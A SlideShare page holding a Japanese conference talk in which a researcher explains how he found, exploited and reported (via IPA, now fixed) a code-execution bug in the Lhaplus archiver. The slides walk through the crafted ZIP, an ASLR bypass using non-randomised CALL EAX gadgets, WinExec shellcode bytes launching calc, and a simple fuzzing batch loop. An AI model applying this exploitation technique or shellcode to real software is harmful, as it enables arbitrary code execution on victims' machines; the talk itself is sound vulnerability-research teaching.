いでよ、電卓!

11,658 views

Published on

第4期サイボウズラボユース成果報告会の発表資料

Published in: Technology
0 Comments
15 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
11,658
On SlideShare
0
From Embeds
0
Number of Embeds
6,849
Actions
Shares
0
Downloads
31
Comments
0
Likes
15
Embeds 0
No embeds

No notes for slide

いでよ、電卓!

  1. 1. いでよ、電卓! ZIP 👆 Click Click IDEYO_CALC.zip Masato Kinugawa
  2. 2. 自己紹介(1) • Masato Kinugawa • 脆弱性を発見することが好き • 学生ではない http://labs.cybozu.co.jp/recruit/youth.html
  3. 3. 自己紹介(2) • 普段は家で脆弱性を探してお金を稼ぐ人 • サイボウズにもいつもお世話になっております
  4. 4. サイボウズ・ラボユースとは サイボウズ・ラボユースは、世界に通用する日 本の若手エンジニアの発掘と育成を目指すこと を目的とし、学生の若手クリエイターに研究開 発の機会を提供する場として、2011年3月31日 に設立されました。 2011年度、2012年度、2013年度、2014年 度では、日本全国より応募のあった中から高校 生1名、工業高校生1名、大学生7名、大学院生4 名、バグハンター1名、合計14名を選抜し、サ イボウズ・ラボの社員が直々に開発を指導し、 それぞれの研究テーマに取り組んでいただきま した。 https://atnd.org/events/64358
  5. 5. これまでやってきたこと 脆弱なサイト alert()の実行!
  6. 6. これからやりたいこと 脆弱なEXE 電卓の実行!
  7. 7. 当初のテーマ 「Webアプリケーションの脆弱性発見」 そのきっかけとは ➡ 東京体験・出社体験しながら、 ガツガツWebの脆弱性を 発見するぞ~ ところがなぜかアセンブリ言語を学ぶことに… 僕
  8. 8. 最初の数日 • ちょうどAdobe Flashの脆弱性をみていたのでその 続きを追うことにした (このバグは後日CVE-2014-0548として修正) • メモリ関連のバグを追っていた訳ではなかったが検 証中に… _人人人人人人人_ > 突然のクラッシュ <  ̄Y^Y^Y^Y^Y^Y^Y^Y ̄
  9. 9. 竹迫さん このとき バイナリ関連の脆弱性も発見できるように なりたいんですよねー ここで勉強すればいいじゃないですか 僕
  10. 10. 竹迫さん このとき バイナリ関連の脆弱性も発見できるように なりたいんですよねー ここで勉強すればいいじゃないですか 僕
  11. 11. それからのラボユース • ずっとアセンブリ言語読んでた • 教科書「リバースエンジニアリングバイブル」
  12. 12. ラボユース終了 月日は流れ 2014年11月 某Androidアプリ(.apk)の中をみようと 拡張子を.zipに変更し 普段使うアーカイバで解凍中に… _人人人人人人人_ > 突然のクラッシュ <  ̄Y^Y^Y^Y^Y^Y^Y^Y ̄
  13. 13. 注意 これ以降、現在報告中の現時点で修正され ていない問題を解説します。具体的な問題 箇所はわからないように配慮しています。 http://jvn.jp/jp/JVN12329472/index.html 修正されました! JVN#12329472: Lhaplus において任意のコードを実行される脆弱性
  14. 14. おや、クラッシュのようすが… ZIPのバイナリ 50 4B 03 04 ... 41 41 41 41 CC 4A 1F 0B ... EAX = 41414141 ;ここで 41414141+C のアドレスをReadしてクラッシュ MOV EAX,DWORD PTR DS:[EAX+C]
  15. 15. 悪用できそ うな空気 おや、クラッシュのようすが… ;ここで 41414141+C のアドレスをReadしてクラッシュ MOV EAX,DWORD PTR DS:[EAX+C] 50 4B 03 04 ... 41 41 41 41 CC 4A 1F 0B ... EAX = 41414141 ZIPのバイナリ
  16. 16. 友人バグハンターに相談 悪用できそ うな空気 悪用できそ うな空気 悪用できそ うな空気 悪用できそ うな空気 これ、CALLの部分でおちてない? どうもデバッガでアタッチしない状態で 解凍をはじめるとおちる位置が変わる 友 MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] ;crash!
  17. 17. そして... • 友人がXP上で電卓起動に成功! • でもXPは既にMicrosoftがサポートを終了している • 悪用可能なことの証明とはいいがたい 自力で新しいWindowsでも実行できるよう頑張る! 🔥よみがえるバイナリ熱
  18. 18. 最近のWindowsにあるASLR • 配置されるメモリ位置をランダムにする機能 • これにより狙ったメモリを実行することが困難に • 今回のアプリは開発者が明示的にASLRを指定して いなかったので、一部はランダムでない ワンチャン有る?!
  19. 19. XPで起きたこと振り返り
  20. 20. XPで起きたこと メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
  21. 21. XPで起きたこと メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
  22. 22. XPで起きたこと 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … いつも同じアドレスに ZIPファイルのバイナリ が配置される
  23. 23. XPで起きたこと 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 紆余曲折を経て クラッシュした 命令へ
  24. 24. XPで起きたこと 37 C6 E0 2B 34 FB 2A 43 6C 5E 22 86 3C 3C 25 6A 55 6A E3 1B DB 75 B1 8C F5 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 紆余曲折を経て クラッシュした 命令へ このときのCALL先を 決めているEAXはいつも ここを指す
  25. 25. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | ZIPのバイナリ ... 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … CALL先をうまく変え 好きな命令を実行するよう ZIPのバイナリを編集してみる MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10]
  26. 26. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBPへコピーされる値 逆さにして EBP = XX XX XX 04
  27. 27. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBP+10はここで
  28. 28. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] EBP+10はここで その中身はこれ XX XX XX 18 (= 次実行するアドレス)
  29. 29. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] CALLでとぶ アドレスは ここなので
  30. 30. XPで起きたこと 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] CALLでとぶ アドレスは ここなので 次実行されるのはここから (自分が指定した命令!)
  31. 31. XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ 命令に直すと
  32. 32. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 PUSH 0 (文字列の終端)
  33. 33. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 PUSH 636C6163 (calc という文字列)
  34. 34. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 MOV EBX,ESP EBX
  35. 35. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 PUSH 1 EBX
  36. 36. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer PUSH EBX EBX
  37. 37. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer WinExec関数は 引数1 コマンド文字列へのポインタ 引数2 表示状態 とするとコマンドが実行できる
  38. 38. スタック XPで起きたこと XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 0 636C6163 1 Pointer
  39. 39. ASLRがあると XXXXXX18 |6A 00 PUSH 0 XXXXXX1A |68 63616C63 PUSH 636C6163 XXXXXX1F |8BDC MOV EBX,ESP XXXXXX21 |6A 01 PUSH 1 XXXXXX23 |53 PUSH EBX XXXXXX24 |E8 YYYYYYYY CALL kernel32.WinExec 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … XXXXXX10 | XXXXXX14 | XXXXXX18 | XXXXXX1C | XXXXXX20 | XXXXXX24 | メ モ リ ➊このアドレス が毎回変わる ❷WinExecの 位置が変わる
  40. 40. ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] アドレスは変わるが EAXは必ずここ
  41. 41. ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] アドレスは変わるが EAXは必ずここ それなら JMP EAX/CALL EAX みたいな部分にこの CALLでとべば...
  42. 42. ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … メ モ リ ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] それなら JMP EAX/CALL EAX みたいな部分にこの CALLでとべば... ここから実行するから なんだかできそう!
  43. 43. ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ JMP EAX = FF E0 CALL EAX = FF D0 になるので このバイト値を検索
  44. 44. 00666666 | FF D0 … | ASLRなしのどこか CALL EAXが あった! ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ JMP EAX = FF E0 CALL EAX = FF D0 になるので このバイト値を検索
  45. 45. 00666666 | FF D0 … | ASLRなしのどこか ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] こうとびたい CALL EAX
  46. 46. 00666666 | FF D0 … | ASLRなしのどこか ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] こうとびたい 00666666が 入ってる場所が あればいけそう CALL EAX
  47. 47. 00666666 | FF D0 … | ➊への対処 04 XX XX XX 18 XX XX XX 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか あった! CALL EAX
  48. 48. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか 数をあわせる CALL EAX
  49. 49. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX
  50. 50. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45
  51. 51. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55
  52. 52. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
  53. 53. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
  54. 54. 00666666 | FF D0 … | ➊への対処 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ MOV EBP,DWORD PTR DS:[EAX] CALL DWORD PTR SS:[EBP+10] 66 66 66 00 … 00555555 | 00555559 |ASLR なしの どこか CALL EAX EBP = 00 55 55 45 EBP+10 = 00 55 55 55 CALL先 = 00 66 66 66
  55. 55. ➊への対処 ???????? |45 INC EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00 ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ アドレスに 使ったところが 命令になる 命令に直すと↓
  56. 56. ➊への対処 ???????? |45 INC EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00 ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 … ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ ここは 命令として おかしい
  57. 57. ➊への対処 ???????? |45 INC EBP ???????? |55 PUSH EBP ???????? |55 PUSH EBP ???????? |00FF ADD BH,BH ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ... 45 55 55 00 FF 6A 00 68 63 61 6C 63 8B DC 6A 01 53 E8 YY YY YY YY 46 50 ???????? | ???????? | ???????? | ???????? | ???????? | ???????? | メ モ リ これで有効な 命令に! 適当に たした
  58. 58. ❷への対処(WinExecが不明) ASLRがきいていない部分にWinExecを呼び出し ている箇所があった!そこへとべば解決! 00444444| CALL <JMP.&kernel32.WinExec> ???????? |6A 00 PUSH 0 ???????? |68 63616C63 PUSH 636C6163 ???????? |8BDC MOV EBX,ESP ???????? |6A 01 PUSH 1 ???????? |53 PUSH EBX ???????? |E8 YYYYYYYY CALL kernel32.WinExec ???????? |68 00444444 PUSH 44444400 ???????? |C3 RETN
  59. 59. 証明はできた! IPAを通して報告! 後日 ファイルがでかすぎて開発者が問題箇所を 特定できないと思います… IPA 実証コードは 15MB以上... (元ファイルを攻撃可能なように改変しただけ) できれば小さくしたかったが...
  60. 60. もう一度頑張る • ひたすら動的解析 • アセンブリだけみててもキツイのでZIPの構造 を調べる
  61. 61. その結果 • ある領域が特定のバイト値になっていると脆弱 なルーチンに到達することを発見 • これが鍵になり 15MB → 12KBの減量に成功!
  62. 62. もっと頑張る • 同アーカイバは多数の圧縮フォーマットをサ ポート • こんなにあればどれかには穴があるのでは? rar cab arj lzh zoo ZIP
  63. 63. Fuzzingすることに • Fuzzingは脆弱性発見手法の1つ • 非常に参考になる本:
  64. 64. 簡単にFuzzingする 1 対応フォーマットの小さなファイルを用意
  65. 65. 簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る FF 4B 03 04 0A … 50 4B 03 04 0A …base.zip test0.zip
  66. 66. 簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF 03 04 0A … FF 4B 03 04 0A … 50 4B 03 04 0A …base.zip test0.zip test1.zip
  67. 67. 簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF 03 04 0A … 50 4B FF 04 0A … FF 4B 03 04 0A … 50 4B 03 04 0A …base.zip test0.zip test1.zip test2.zip
  68. 68. 簡単にFuzzingする 2 ファイルの先頭から順番にわずかにファイル の中身を変えたものを作る 50 FF 03 04 0A … 50 4B FF 04 0A … 50 4B 03 FF 0A … FF 4B 03 04 0A … 50 4B 03 04 0A … … base.zip test0.zip test1.zip test2.zip test3.zip
  69. 69. 簡単にFuzzingする 3 アーカイバにくわせクラッシュしないか見る 50 FF 03 04 0A … 50 4B FF 04 0A … 50 4B 03 FF 0A … FF 4B 03 04 0A … 50 4B 03 04 0A … … base.zip test0.zip test1.zip test2.zip test3.zip 👀
  70. 70. 簡単にFuzzingする [作成] Python(ただバイトを変えるだけ) [起動] バッチファイル(起動/終了を繰り返すだけ) 超単純だが (悪用可能かどうかは別として) 様々なソフトで試すと結構クラッシュにぶつかる for %%d in (*.zip) do start "" target.exe "%%d"&timeout 5&taskkill /IM target.exe 同アーカイバで悪用可能なクラッシュも検出! その圧縮フォーマットとは... ➡
  71. 71. ZOO 一番ヒントになったzoo展開のソース http://archives.math.utk.edu/software/mul ti-platform/gap/util/unzoo.c 情報が少なくて厳しい なんとかある領域が 原因であることを特定
  72. 72. 今後の展望 【目標】年内にメモリ関連のバグで報奨金を得る そのために: • C/C++プログラミングの理解(ソースコードを 想像できないと輪郭が掴み辛い) • アセンブリ言語を読む、読む、読む • もう少し賢いファジングをしたい • 実行した経路(コード網羅率)を記録し、観察すると いいそうなので注目中
  73. 73. ラボユース ~ 現在 バイナリも少しできる(?)人 Webしかできない人
  74. 74. 電卓起動 しまくるぞっ!
  75. 75. @kinugawamasato ✉ masatokinugawa [at] gmail.com Thanks!

×